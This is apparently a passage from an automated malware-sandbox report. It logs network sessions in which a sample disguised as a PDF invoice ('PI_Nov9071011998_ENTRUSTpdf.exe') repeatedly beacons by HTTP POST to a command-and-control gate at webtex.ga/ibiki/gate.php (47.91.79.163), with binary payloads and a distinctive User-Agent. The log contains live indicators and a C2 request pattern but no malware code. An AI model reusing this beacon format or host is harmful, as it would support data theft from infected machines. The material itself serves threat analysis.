                                    281192.168.2.35002647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    282192.168.2.35002747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    283192.168.2.35002847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    284192.168.2.35002947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    285192.168.2.35003047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    286192.168.2.35003147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    287192.168.2.35003247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    288192.168.2.35003347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    289192.168.2.35003447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    29192.168.2.34974347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.097711086 CET143OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.155303001 CET144INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    290192.168.2.35003547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    291192.168.2.35003647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    292192.168.2.35003747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    293192.168.2.35003847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    294192.168.2.35003947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    295192.168.2.35004047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    296192.168.2.35004147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    297192.168.2.35004247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    298192.168.2.35004347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    299192.168.2.35004447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.34971247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:30.152512074 CET68OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:30.214601994 CET69INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:47 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    30192.168.2.34974447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.418473959 CET147OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.476969004 CET148INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    300192.168.2.35004547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    31192.168.2.34974747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:41.727267027 CET158OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:41.777842045 CET163INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    32192.168.2.34974847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.032912016 CET166OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.092412949 CET171INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    33192.168.2.34974947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.331414938 CET171OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.389555931 CET172INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    34192.168.2.34975047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.653877020 CET173OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:42.717298985 CET173INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    35192.168.2.34975147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:42.984813929 CET174OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.050733089 CET175INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    36192.168.2.34975247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.283330917 CET175OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.342667103 CET176INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    37192.168.2.34975547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.612446070 CET190OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.673908949 CET196INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    38192.168.2.34975647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:43.931444883 CET198OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:43.995368004 CET199INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    39192.168.2.34975847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:44.249686956 CET204OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:44.316339016 CET208INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.34971347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:30.776444912 CET70OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:30.840723038 CET70INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    40192.168.2.34975947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:44.661642075 CET212OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:44.797399998 CET213INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    41192.168.2.34976047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.021437883 CET214OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.078031063 CET214INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    42192.168.2.34976147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.361001968 CET215OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.419547081 CET216INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    43192.168.2.34976247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:45.691221952 CET217OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:45.752643108 CET217INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    44192.168.2.34976347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.008230925 CET218OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.068412066 CET218INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    45192.168.2.34976447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.321985960 CET219OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.384202957 CET220INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    46192.168.2.34976547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.623970985 CET221OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:46.686218977 CET221INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    47192.168.2.34976647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:46.941906929 CET222OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.002928019 CET223INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    48192.168.2.34976747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.207695961 CET223OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.267354965 CET224INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    49192.168.2.34976847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.508867979 CET225OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.583863974 CET225INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.34971447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.118510962 CET71OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.264031887 CET72INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    50192.168.2.34976947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:47.814805984 CET226OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:47.873610973 CET227INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    51192.168.2.34977047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:48.133006096 CET227OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
